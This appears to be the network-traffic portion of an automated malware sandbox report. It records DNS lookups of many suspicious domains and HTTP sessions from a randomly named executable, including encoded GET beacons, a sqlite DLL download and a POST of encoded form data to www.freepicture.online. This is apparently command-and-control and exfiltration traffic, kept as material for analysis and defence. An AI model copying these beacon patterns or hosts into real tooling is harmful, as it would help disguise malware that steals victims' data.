                                        Sep 11, 2024 10:11:32.596515894 CEST | 80 | 49198 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:32.596534967 CEST | 80 | 49198 | 43.242.202.169 | 192.168.2.22
                                        Sep 11, 2024 10:11:32.596649885 CEST | 49198 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:32.599469900 CEST | 49198 | 80 | 192.168.2.22 | 43.242.202.169
                                        Sep 11, 2024 10:11:32.604309082 CEST | 80 | 49198 | 43.242.202.169 | 192.168.2.22
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Sep 11, 2024 10:08:26.303112984 CEST | 138 | 138 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:00.516547918 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:00.529396057 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:00.530128956 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:01.292959929 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:02.057602882 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:07.840605021 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:07.854686022 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:11.238426924 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:11.247700930 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:14.345866919 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:15.099033117 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:15.863327980 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:18.818635941 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:18.854782104 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:32.137922049 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:32.147929907 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:32.148597002 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:32.898763895 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:33.663218021 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:35.450675011 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:35.484913111 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:35.486026049 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:36.237073898 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:37.001467943 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:38.783665895 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:38.800095081 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:38.800646067 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:39.559822083 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:40.324233055 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:42.106103897 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:42.116044044 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:09:42.116693974 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:42.867156982 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:43.631513119 CEST | 137 | 137 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:09:49.407293081 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:09:49.685138941 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:10:03.343184948 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:10:03.356020927 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:10:16.723469973 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:10:16.746438980 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:10:26.002357960 CEST | 138 | 138 | 192.168.2.22 | 192.168.2.255
                                        Sep 11, 2024 10:10:30.086798906 CEST | 62672 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:10:30.105835915 CEST | 53 | 62672 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:10:43.528373003 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:10:43.553064108 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:10:56.803816080 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:10:56.823900938 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:11:10.403692007 CEST | 54842 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:11:10.472023964 CEST | 53 | 54842 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:11:23.766645908 CEST | 58105 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:11:24.076240063 CEST | 53 | 58105 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:11:37.609158039 CEST | 64928 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:11:37.645036936 CEST | 53 | 64928 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:11:38.653474092 CEST | 57390 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:11:38.671403885 CEST | 53 | 57390 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:11:39.682210922 CEST | 58095 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:11:39.722929001 CEST | 53 | 58095 | 8.8.8.8 | 192.168.2.22
                                        Sep 11, 2024 10:11:40.743292093 CEST | 54261 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 11, 2024 10:11:40.756820917 CEST | 53 | 54261 | 8.8.8.8 | 192.168.2.22
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Sep 11, 2024 10:09:00.516547918 CEST | 192.168.2.22 | 8.8.8.8 | 0xee20 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:07.840605021 CEST | 192.168.2.22 | 8.8.8.8 | 0x4722 | Standard query (0) | www.726075.buzz | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:11.238426924 CEST | 192.168.2.22 | 8.8.8.8 | 0x8376 | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:18.818635941 CEST | 192.168.2.22 | 8.8.8.8 | 0x422c | Standard query (0) | www.freepicture.online | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:32.137922049 CEST | 192.168.2.22 | 8.8.8.8 | 0xd406 | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:35.450675011 CEST | 192.168.2.22 | 8.8.8.8 | 0x990b | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:38.783665895 CEST | 192.168.2.22 | 8.8.8.8 | 0x7084 | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:42.106103897 CEST | 192.168.2.22 | 8.8.8.8 | 0x226 | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:49.407293081 CEST | 192.168.2.22 | 8.8.8.8 | 0xacbf | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:03.343184948 CEST | 192.168.2.22 | 8.8.8.8 | 0xa99f | Standard query (0) | www.golbasi-nakliyat.xyz | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:16.723469973 CEST | 192.168.2.22 | 8.8.8.8 | 0x4225 | Standard query (0) | www.mfgamecompany.shop | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:30.086798906 CEST | 192.168.2.22 | 8.8.8.8 | 0x9e8a | Standard query (0) | www.quilo.life | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:43.528373003 CEST | 192.168.2.22 | 8.8.8.8 | 0xd8d6 | Standard query (0) | www.qiluqiyuan.buzz | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:56.803816080 CEST | 192.168.2.22 | 8.8.8.8 | 0x2422 | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:10.403692007 CEST | 192.168.2.22 | 8.8.8.8 | 0xabbc | Standard query (0) | www.kckartal.xyz | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:23.766645908 CEST | 192.168.2.22 | 8.8.8.8 | 0x9fd1 | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:37.609158039 CEST | 192.168.2.22 | 8.8.8.8 | 0x62cb | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:38.653474092 CEST | 192.168.2.22 | 8.8.8.8 | 0x943a | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:39.682210922 CEST | 192.168.2.22 | 8.8.8.8 | 0x6362 | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:40.743292093 CEST | 192.168.2.22 | 8.8.8.8 | 0x7d16 | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Sep 11, 2024 10:09:00.529396057 CEST | 8.8.8.8 | 192.168.2.22 | 0xee20 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:07.854686022 CEST | 8.8.8.8 | 192.168.2.22 | 0x4722 | No error (0) | www.726075.buzz |  | 47.57.185.227 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:11.247700930 CEST | 8.8.8.8 | 192.168.2.22 | 0x8376 | No error (0) | www.sqlite.org |  | 45.33.6.223 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:18.854782104 CEST | 8.8.8.8 | 192.168.2.22 | 0x422c | No error (0) | www.freepicture.online | freepicture.online |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:18.854782104 CEST | 8.8.8.8 | 192.168.2.22 | 0x422c | No error (0) | freepicture.online |  | 89.58.49.1 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:32.147929907 CEST | 8.8.8.8 | 192.168.2.22 | 0xd406 | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:35.484913111 CEST | 8.8.8.8 | 192.168.2.22 | 0x990b | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:38.800095081 CEST | 8.8.8.8 | 192.168.2.22 | 0x7084 | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:42.116044044 CEST | 8.8.8.8 | 192.168.2.22 | 0x226 | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:49.685138941 CEST | 8.8.8.8 | 192.168.2.22 | 0xacbf | No error (0) | www.hm62t.top | hm62t.top |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Sep 11, 2024 10:09:49.685138941 CEST | 8.8.8.8 | 192.168.2.22 | 0xacbf | No error (0) | hm62t.top |  | 154.23.184.240 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:03.356020927 CEST | 8.8.8.8 | 192.168.2.22 | 0xa99f | No error (0) | www.golbasi-nakliyat.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:03.356020927 CEST | 8.8.8.8 | 192.168.2.22 | 0xa99f | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:03.356020927 CEST | 8.8.8.8 | 192.168.2.22 | 0xa99f | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:16.746438980 CEST | 8.8.8.8 | 192.168.2.22 | 0x4225 | No error (0) | www.mfgamecompany.shop | mfgamecompany.shop |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:16.746438980 CEST | 8.8.8.8 | 192.168.2.22 | 0x4225 | No error (0) | mfgamecompany.shop |  | 185.173.111.76 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:30.105835915 CEST | 8.8.8.8 | 192.168.2.22 | 0x9e8a | No error (0) | www.quilo.life |  | 203.161.43.228 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:43.553064108 CEST | 8.8.8.8 | 192.168.2.22 | 0xd8d6 | No error (0) | www.qiluqiyuan.buzz |  | 161.97.168.245 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:56.823900938 CEST | 8.8.8.8 | 192.168.2.22 | 0x2422 | No error (0) | www.bola88site.one | bola88site.one |  | CNAME (Canonical name) | IN (0x0001) | false
                                        Sep 11, 2024 10:10:56.823900938 CEST | 8.8.8.8 | 192.168.2.22 | 0x2422 | No error (0) | bola88site.one |  | 172.96.191.39 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:10.472023964 CEST | 8.8.8.8 | 192.168.2.22 | 0xabbc | No error (0) | www.kckartal.xyz |  | 104.21.20.125 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:10.472023964 CEST | 8.8.8.8 | 192.168.2.22 | 0xabbc | No error (0) | www.kckartal.xyz |  | 172.67.192.227 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:24.076240063 CEST | 8.8.8.8 | 192.168.2.22 | 0x9fd1 | No error (0) | www.mizuquan.top |  | 43.242.202.169 | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:37.645036936 CEST | 8.8.8.8 | 192.168.2.22 | 0x62cb | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:38.671403885 CEST | 8.8.8.8 | 192.168.2.22 | 0x943a | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:39.722929001 CEST | 8.8.8.8 | 192.168.2.22 | 0x6362 | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                                        Sep 11, 2024 10:11:40.756820917 CEST | 8.8.8.8 | 192.168.2.22 | 0x7d16 | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                                        • www.726075.buzz
                                        • www.sqlite.org
                                        • www.freepicture.online
                                        • www.hm62t.top
                                        • www.golbasi-nakliyat.xyz
                                        • www.mfgamecompany.shop
                                        • www.quilo.life
                                        • www.qiluqiyuan.buzz
                                        • www.bola88site.one
                                        • www.kckartal.xyz
                                        • www.mizuquan.top
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.22 | 49161 | 47.57.185.227 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:07.874480009 CEST | 455 | OUT | GET /w9nd/?OlTXe=9dRK0h7YIJsGSRnhz+5Tf8djouf69SHBPHBwJCn+XP7nQ6BgyCo2HiS/iTx4FkUQNu4yOr79gxANSvRKU1dByDA5Y/6ByTaTkhQGev+u0gipHNJhsTWzO6tEXOan&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.726075.buzz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:09:08.800055027 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:08 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "6663edd0-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.22 | 49162 | 45.33.6.223 | 80 | 3292 | C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:11.265733957 CEST | 275 | OUT | GET /2018/sqlite-dll-win32-x86-3220000.zip HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Host: www.sqlite.org
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Sep 11, 2024 10:09:11.771234035 CEST | 249 | IN | HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Date: Wed, 11 Sep 2024 08:09:11 GMT
                                        Last-Modified: Tue, 27 Mar 2018 18:53:19 GMT
                                        Cache-Control: max-age=120
                                        ETag: "m5aba931fs6daa9"
                                        Content-type: application/zip; charset=utf-8
                                        Content-length: 449193
                                        Sep 11, 2024 10:09:11.771295071 CEST | 1236 | IN | Data Raw: 50 4b 03 04 14 00 00 00 08 00 79 0f 37 4c f7 02 c2 ea df 04 00 00 2f 14 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a5 34 66 5a a5 34 66 5a 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6
                                        Data Ascii: PKy7L/sqlite3.defUT4fZ4fZuxd(ydrTv{sa,=3O>B*$&LT1?5<iUFKOb>sU80[YYy$p8kLu+5'pbID)t!;:
                                        Sep 11, 2024 10:09:11.771327019 CEST | 224 | IN | Data Raw: 53 fd 2f a6 51 9e 34 2c 90 6f ca bc 7c 9b 94 9f e8 f0 cc f6 59 7a 4c a5 29 86 f5 cf df a8 d8 ec 59 9b ea e6 82 dd b7 0c f4 52 af 3a 56 24 0b 8b 58 2f f0 36 7d b2 56 5e 03 55 69 cd df a8 46 33 ee da 3a 7d a7 cd 3f d0 e0 b3 66 8e db 97 ff 00 50 4b
                                        Data Ascii: S/Q4,o|YzL)YR:V$X/6}V^UiF3:}?fPKy7L:Gsqlite3.dllUT4fZ4fZuxdxT89I&5*b1Q'L@4#*m1dI4;zz
                                        Sep 11, 2024 10:09:11.771358967 CEST | 1236 | IN | Data Raw: 85 7c d0 7c 20 85 90 50 48 00 21 62 c4 33 9e 54 03 a1 f9 c4 cc bb d6 3e 67 92 09 f2 bb ef fb fe ff cf f3 7f 9e f7 79 5e 5a 33 e7 ec b3 f7 da df eb 6b af bd 56 e1 aa e7 4d 16 93 c9 c4 c3 7f e1 b0 c9 b4 d7 a4 ff f3 98 fe df ff 0b c2 7f 53 e7 ee 9b
                                        Data Ascii: || PH!b3T>gy^Z3kVMSjz/o7/=u?>Qa~pqS?z;LIH3`L42hzN0M7$rdatW79?;m?Yo7gN4bMYSXLTY99a$
                                        Sep 11, 2024 10:09:11.771429062 CEST | 1236 | IN | Data Raw: 80 41 e4 fb 5e 86 01 36 89 6e 5c 02 a6 d0 ba f0 8c 35 b0 01 f7 61 81 aa ba 65 e2 0c 6c cc 54 13 5b d5 e1 19 8f c1 a7 e5 cb 49 43 55 bb 18 0f f9 b1 64 b8 1d 1e 7e e1 e8 5e a7 5e f9 b9 d5 d4 da 08 50 4b 1b 9f b7 38 aa 4c ff 0c ad 83 17 a2 3f c9 75
                                        Data Ascii: A^6n\5aelT[ICUd~^^PK8L?u,G6lT{U,#1,:dYO#b=\l.`+Z`VhJ;T}eNb,.7#B.f0H:^pq&F0W&h$H2hIR
                                        Sep 11, 2024 10:09:11.771462917 CEST | 1236 | IN | Data Raw: 2a 36 31 b0 d0 23 44 87 34 f8 eb 47 62 61 1e c8 67 8a a3 bd 94 83 bd 29 e0 06 34 48 97 a3 c6 44 fc 3d d9 b7 4b 09 39 c6 0c 6b db b2 e7 eb 6f 6c 90 9f cc ce 30 1e a5 75 35 39 9c dc 7d 2e bb 44 7a 44 a8 cd 31 2b 5b cd 03 41 9c 4c ab b8 08 67 c2 b2
                                        Data Ascii: *61#D4Gbag)4HD=K9kol0u59}.DzD1+[ALgHr.jj~y*/^0BmuUU?'B?v&C6`e5C'>ug/&+\L:Iv'dyT1'kgd]%
                                        Sep 11, 2024 10:09:11.771497965 CEST | 1236 | IN | Data Raw: a2 4d 2b 95 2f 59 f0 69 1f 53 00 6c d5 6b 33 98 b9 e2 65 c0 f0 96 61 2d 9e 14 b9 fb a2 dc c2 95 c9 db e7 98 ca 88 37 45 4a 58 45 3a 57 97 86 ea e1 6b 89 21 0d a1 a2 20 8d f8 2e a3 e0 49 8b 9c 4c cb 62 67 0d 2a b2 d1 e5 0b 50 db 32 e3 32 b4 09 d7
                                        Data Ascii: M+/YiSlk3ea-7EJXE:Wk! .ILbg*P22{Q)qII0\ro]t87 9vZbSSI]N*=9u\;`(8d~@6]BvA})x^@GSFKtk YSvb[id !c
                                        Sep 11, 2024 10:09:11.771532059 CEST | 1236 | IN | Data Raw: da da ef 4c 42 02 69 a8 04 28 b4 83 18 03 8b 4a a8 cd 84 cd 45 fd 3d 72 b8 82 04 7a 37 df 42 86 94 55 56 b9 bb 82 f8 7a 73 6b cc c0 fc 93 e6 fa 0b 71 f2 e7 15 f1 83 ee 0e cc c1 57 d6 95 7f 86 2c 4e 18 04 22 a1 36 97 93 87 2a 00 09 37 6d 5e a7 e4
                                        Data Ascii: LBi(JE=rz7BUVzskqW,N"6*7m^ZO+ ,'}aJF8k4p(qQ2B n'sPV%<P)[yqA=Lm@9'<u_o<e$gacGcn-PT#00Bmx wco
                                        Sep 11, 2024 10:09:11.771568060 CEST | 552 | IN | Data Raw: 0e 7d ae 7f 12 6a 1f e1 f4 cf 80 fa e3 db c6 f3 30 c9 ac 11 21 d1 47 b8 71 10 cf 5c aa ef 46 0a 17 95 91 09 8c bf 62 7a 3c 0f 07 5f 49 83 50 bb c8 cc 80 01 6c 0b fc dd 3f cb a8 e0 bc 33 aa 1c 22 45 ed 09 61 ff b7 b1 05 d4 63 36 f2 5c b0 0a 2d f1
                                        Data Ascii: }j0!Gq\Fbz<_IPl?3"Eac6\-'@tn/i/7:Ll 4Je<WF_vc*=oa{ljJ'IV<p1~98mV@@l0^9.*fSv^<]VS(0Z)-
                                        Sep 11, 2024 10:09:11.771601915 CEST | 1236 | IN | Data Raw: f0 73 2b eb c4 b8 ec 3b 44 8b 57 bb 04 08 f4 16 90 01 ad 91 26 fb 7b 91 ac be f4 19 93 34 be 0b a4 15 b0 50 30 3b d9 24 95 28 3b e6 72 ae d3 57 95 1e 10 53 59 69 d1 28 dd a7 ae d2 8b de 1a cc 9e 63 a2 fe 3e 29 b5 aa 5d 59 3a 57 b7 b2 11 a7 93 16
                                        Data Ascii: s+;DW&{4P0;$(;rWSYi(c>)]Y:Wb{1ti?dg:b",I9X9UcEd)%8K\&<qD?,S)I8B=,N313Mc%9Q:HZ$4YaM3 x7\RAF;~2d7YR<=-
                                        Sep 11, 2024 10:09:11.776653051 CEST | 1236 | IN | Data Raw: 3d b1 51 e2 61 e1 dd bb 2b bc ee 47 4f 96 45 9e bf 2b fd e8 71 fd 99 8c ec 3a 0f 68 d2 b4 6b 44 fc e1 0f 4c 42 55 39 bc 84 64 dc 13 f5 ef e6 86 fe 15 de de f5 1d 40 30 a1 b5 fa 33 82 09 2d d7 9f 11 4c 28 1f 4f 84 06 c4 d5 c1 d1 dc a6 58 ae a2 18
                                        Data Ascii: =Qa+GOE+q:hkDLBU9d@03-L(OX%G7(Oyfq"+}d@_vl*<P%hbcxjZYCFyaw!WKUIN<SZZqTY;]mvCA`;54TDNulm^Mb


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.22 | 49163 | 89.58.49.1 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:09:18.870980024 CEST | 2472 | OUT | POST /xcfw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Origin: http://www.freepicture.online
                                        Referer: http://www.freepicture.online/xcfw/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 44 69 70 78 6d 6f 37 4f 46 64 39 70 71 6d 31 34 35 56 72 4d 72 41 30 79 53 64 30 33 48 63 2f 48 6d 58 4d 32 31 51 44 31 34 63 54 34 4b 6d 30 5a 4c 2f 4a 47 58 4c 74 49 53 32 79 4b 44 39 39 74 44 6f 36 56 30 5a 70 68 69 2f 46 44 64 35 53 66 74 47 49 6d 69 53 57 46 42 46 68 33 59 70 46 77 52 59 34 54 30 4d 57 35 51 78 43 36 68 48 4f 54 31 57 4b 31 4a 6f 46 58 62 4e 34 6a 50 36 44 4c 6c 34 58 66 58 52 6b 65 4c 58 75 39 59 78 54 55 6e 75 74 6a 61 44 76 6e 44 6b 36 2b 47 75 4f 6c 73 4a 50 31 51 52 43 2b 37 36 6b 66 77 58 68 4e 2f 47 53 7a 38 48 4f 39 42 2b 4c 6b 79 64 30 63 68 73 47 65 72 6a 70 53 58 45 72 74 6a 55 65 42 51 79 46 65 4c 43 4f 34 49 4f 59 2b 37 34 34 53 52 4a 63 6d 6c 6a 64 4d 4c 38 71 6e 53 4c 2b 7a 56 35 75 78 50 48 69 66 4c 51 73 5a 46 65 68 71 70 7a 55 4b 5a 54 68 54 4c 4e 43 4c 41 34 41 4b 55 75 46 45 34 41 4e 2f 4d 54 41 55 55 43 69 61 6e 70 2b 64 4b 32 49 63 62 6d 39 38 64 76 43 5a 55 4d 35 45 4f 32 56 51 76 35 4b 6e 4f 32 43 [TRUNCATED]
